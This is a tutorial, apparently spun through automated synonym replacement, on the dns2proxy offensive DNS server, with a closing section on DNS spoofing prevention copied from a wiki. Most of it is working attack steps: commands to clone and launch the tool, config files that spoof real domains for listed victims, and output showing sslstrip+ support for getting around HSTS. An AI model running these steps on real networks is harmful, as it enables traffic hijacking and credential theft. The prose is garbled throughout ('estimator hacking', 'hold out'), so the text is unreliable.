dns2proxy is an offensive DNS server that offers diverse features for post-exploitation i time you’ve changed the DNS server of a victim. This tools offers dissimilar features for post-explotation i time yous modify the DNS server of a Victim. 
DNS spoofing, also referred to every bit DNS cache poisoning, is a shape of estimator hacking inwards which corrupt Domain Name System information is introduced into the DNS resolver’s cache, causing the get upwards server to furnish an wrong IP address. This results inwards traffic beingness diverted to the attacker’s estimator (or whatsoever other computer).
Features
- Traditional DNS Spoofing
- Implements DNS Spoofing via Forwarding
- Detects together with corrects changes for sslstrip to work
Installation
dnspython (www.dnspython.com) is needed. Tested amongst Python 2.6 together with Python 2.7. You tin exactly clone git together with kickoff working.
root@kali: # git clone https://github.com/LeonardoNve/dns2proxy.git
Starting dns2proxy: DNS Spoofing via Forwarding
You demand to kickoff dns2proxy together with bind it to an interface IP address. Usually this is eth0 interface.
root@kali: # cd dns2proxy/
root@kali: /dns2proxy#
root@kali: /dns2proxy# python dns2proxy.py -i eth0 -u 10.0.2.15
Non spoofing to 127.0.0.1
Specific host spoofing www.abc.com amongst 10.10.10.20
Specific domain IP .facebook.com amongst 172.217.17.68
Specific domain IP .fbi.gov amongst 172.217.17.68
Specific domain IP .one.com amongst 127.0.0.1
DNS Forwarding activado....
binded to UDP port 53.
waiting requests.
This characteristic implements the develop on of DNS spoofing adding 2 IP address at the top of the resolution together with configuring the organization to forrad the connections. Check slides at BlackHat Asia 2014 OFFENSIVE: EXPLOITING DNS SERVERS CHANGES together with the Demo Video. To launch this attach at that topographic point is a shellscript that automatically configure the organization using IP tables. You must edit this file to adjust it to your system. DON´T FORGET AdminIP variable!!!!
Both IPs must hold out at the same organization to allow dns2proxy.py configurate the forwarding
Traditional DNS Spoofing
Traditional DNS Spoof adding to the response the master copy IP address. Using spoof.cfg file: 
root@kali: /dns2proxy# echo "www.blakcmoreops.com 127.0.0.1" >; spoof.cfg
root@kali: /dns2proxy# dig www.blakcmoreops.com @localhost
; <<>> DiG 9.10.3-P4-Debian <<>> www.blakcmoreops.com @localhost
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 51485
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 8192
;; QUESTION SECTION:
;www.blakcmoreops.com. IN A
;; Query time: 357 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Mar 21 14:07:23 AEDT 2017
;; MSG SIZE rcvd: 49
root@kali: /dns2proxy#
or yous tin role domains.cfg file to spoof all host of a same domain:
root@kali: /dns2proxy# truthful cat domains.cfg
.facebook.com 172.217.17.68
.fbi.gov 172.217.17.68
.one.com 127.0.0.1
root@kali: /dns2proxy#
Hostnames at nospoof.cfg volition no hold out spoofed.
Detects together with corrects changes for sslstrip to work
Automatically the dns server detects together with right the changes thats my sslstrip+ produce to the hostnames to avoid HSTS, thence volition response properly. This server is necessary to brand the sslstrip+ attack.
root@kali: /dns2proxy# nslookup webaccounts.google.com 127.0.0.1 <-- DNS response similar accounts.google.com
Server: 127.0.0.1
Address: 127.0.0.1#53
Name: webaccounts.google.com
Address: 172.16.48.128
Name: webaccounts.google.com
Address: 172.16.48.230
Name: webaccounts.google.com
Address: 74.125.200.84
root@kali: /dns2proxy# nslookup wwww.yahoo.com 127.0.0.1 <-- Take help of the four w! DNS response like
Server: 127.0.0.1 www.yahoo.com
Address: 127.0.0.1#53
Name: wwww.yahoo.com
Address: 172.16.48.128
Name: wwww.yahoo.com
Address: 172.16.48.230
Name: wwww.yahoo.com
Address: 68.142.243.179
Name: wwww.yahoo.com
Address: 68.180.206.184
Config files description
domains.cfg (or dominios.cfg): resolve all hosts for the listed domains amongst the listed IP
Ex: .facebook.com 1.2.3.4 .fbi.gov 1.2.3.4
spoof.cfg : Spoof a host amongst a ip
Ex: www.nsa.gov 127.0.0.1
nospoof.cfg: Send e'er a legit response when asking for these hosts.
Ex. mail.google.com
nospoofto.cfg: Don’t ship mistaken responses to the IPs listed there.
Ex: 127.0.0.1 4.5.6.8
victims.cfg: If non empty, solely ship mistaken responses to these IP addresses.
Ex: 23.66.163.36 195.12.226.131
resolv.conf: DNS server to forrad the queries.
Ex: nameserver 8.8.8.8
Prevention together with mitigation
Many cache poisoning attacks against DNS servers tin hold out prevented past times beingness less trusting of the information passed to them past times other DNS servers, together with ignoring whatsoever DNS records passed dorsum which are non straight relevant to the query. For example, versions of BIND 9.5.0-P1 together with higher upwards perform these checks. Source port randomization for DNS requests, combined amongst the role of cryptographically-secure random numbers for selecting both the source port together with the 16-bit cryptographic nonce, tin greatly cut the probability of successful DNS race attacks.
However, when routers, firewalls, proxies, together with other gateway devices perform network address translation (NAT), or to a greater extent than specifically, port address translation (PAT), they may rewrite source ports inwards club to rail connectedness state. When modifying source ports, PAT devices may take source port randomness implemented past times nameservers together with stub resolvers.
Secure DNS (DNSSEC) uses cryptographic digital signatures signed amongst a trusted world telephone substitution certificate to create upwards one's heed the authenticity of data. DNSSEC tin counter cache poisoning attacks, but every bit of 2008 was non notwithstanding widely deployed. In 2010 DNSSEC was implemented inwards the Internet root zone servers.
This sort of develop on tin hold out mitigated at the carry layer or application layer past times performing end-to-end validation i time a connectedness is established. H5N1 mutual instance of this is the role of Transport Layer Security together with digital signatures. For example, past times using HTTPS (the secure version of HTTP), users may banking venture agree whether the server’s digital certificate is valid together with belongs to a website’s expected owner. Similarly, the secure musical rhythm remote login plan checks digital certificates at endpoints (if known) earlier proceeding amongst the session. For applications that download updates automatically, the application tin embed a re-create of the signing certificate locally together with validate the signature stored inwards the software update against the embedded certificate [Source: Wiki]
